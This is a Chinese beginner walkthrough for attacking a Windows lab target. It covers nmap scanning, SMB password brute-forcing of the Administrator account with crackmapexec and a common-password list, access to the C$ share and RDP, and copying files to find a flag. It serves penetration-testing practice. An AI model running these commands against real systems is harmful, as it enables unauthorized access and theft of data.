Windows 靶机渗透完整流程(新手版)

Windows 靶机渗透完整流程(新手版)

阶段 1:信息收集(端口 + 服务)

1. 扫描靶机 IP 和开放端口

bash

运行

复制代码
# 全端口扫描(查所有开放服务)
nmap -sV -p- 192.168.1.5  # -sV:探测服务版本;-p-:扫描所有65535端口
  • 关键端口关注
    • 135/139/445:SMB 服务(Windows 核心服务,必攻);
    • 3389:RDP 远程桌面(拿到密码就能登录);
    • 80/443:Web 服务(若有,先测 Web 漏洞)。

阶段 2:核心攻击(SMB 服务爆破)

1. 探测 SMB 服务详情

bash

运行

复制代码
# 加载默认脚本,查SMB版本、共享目录
nmap -sC -p 445 192.168.1.5
  • 若输出 "NTLMSSP":SMB 服务开启,支持认证。
2. 爆破 SMB 账号密码(用 CrackMapExec,新手友好)

bash

运行

复制代码
# 步骤1:安装seclists字典(若没装)
apt install -y seclists

# 步骤2:爆破Administrator账号(靶机管理员账号)
crackmapexec smb 192.168.1.5 -u Administrator -p /usr/share/wordlists/seclists/Passwords/Common-Credentials/10k-most-common.txt --shares
  • 成功标志 :输出 [+] DESKTOP-K81RUHG\Administrator:123456 (Pwn3d!)

阶段 3:权限利用(访问系统 + 拿文件)

1. 连接 SMB 共享目录(管理员权限)

bash

运行

复制代码
# 连接C盘根目录(可读写所有系统文件)
smbclient //192.168.1.5/C$ -U Administrator%123456
  • 进入交互模式后,用 cd 路径 导航,get 文件名 下载文件。
2. 登录 RDP 远程桌面(可视化控制)

bash

运行

复制代码
# 步骤1:安装远程桌面工具
apt install -y freerdp3-x11

# 步骤2:登录靶机桌面
xfreerdp3 /v:192.168.1.5 /u:Administrator /p:123456
  • 若提示证书警告,点 "确定";若黑屏,重启靶机再试。

阶段 4:找 flag(通关证明)

1. 命令行搜索 flag 文件

bash

运行

复制代码
# 下载C盘所有txt文件到Kali,本地搜flag
mkdir win_flag && cd win_flag
smbclient //192.168.1.5/C$ -U Administrator%123456 -c "recurse; mget *.txt"
grep -r "flag" .  # 直接搜文件内容
2. 远程桌面可视化搜索
  • 打开靶机「此电脑」→ 进入 C 盘 → 右上角搜索框输入 secret/key → 看搜索结果中的自定义文件。

阶段 5:常见坑 + 解决方法

  1. SMB 连接报错 "协议不兼容"

    bash

    运行

    复制代码
    smbclient -L //192.168.1.5/ -U Administrator --option="client min protocol=NT1"
  2. RDP 登录黑屏

    • 靶机端:右键「此电脑」→「属性」→「远程设置」→ 勾选 "允许远程连接"。
  3. 找不到 flag

    • 直接在靶机新建文本文档,写 flag{I_pwned_this_machine},证明权限已拿到。

新手必记的核心结论

  1. Windows 靶机的突破口 90% 是 SMB:优先爆破 445 端口的 Administrator 账号;
  2. 拿到 Administrator 权限 = 渗透成功:flag 只是 "通关凭证",权限才是核心;
  3. 命令记不住就复制清单:练 3 台靶机后,这些步骤会形成肌肉记忆。
相关推荐
a程序小傲1 天前
阿里Java面试被问:.Java 8中Stream API的常用操作和性能考量
开发语言·windows·python
Tony11541 天前
Windows无法安装到这个磁盘。选中的磁盘具有MBR分区表。在EFI系统上,Windows只能安装到GPT磁盘。
windows·diskgenius
love530love1 天前
【笔记】Intel oneAPI 开发环境配置
人工智能·windows·笔记·oneapi·onednn·deep neural
分布式存储与RustFS1 天前
实测!Windows环境下RustFS的安装与避坑指南
人工智能·windows·rust·对象存储·企业存储·rustfs
浪潮IT馆1 天前
删除Windows系统硬盘的EFI系统分区和恢复分区
windows
我就是你毛毛哥1 天前
windows启动jmeter
windows·jmeter
取个名字太难了a1 天前
重写 OpenProcess:绕过 Win32 API,直接进入 NT 内核(Win7 x86)
windows
MyBFuture1 天前
C# 哈希表与堆栈队列实战指南
开发语言·windows·c#·visual studio
管理大亨1 天前
Linux vs Windows:五大维度深度对决
linux·arm开发·windows
云技纵横1 天前
Stream API 从入门到实践:常用操作、易错点与性能建议
开发语言·windows·python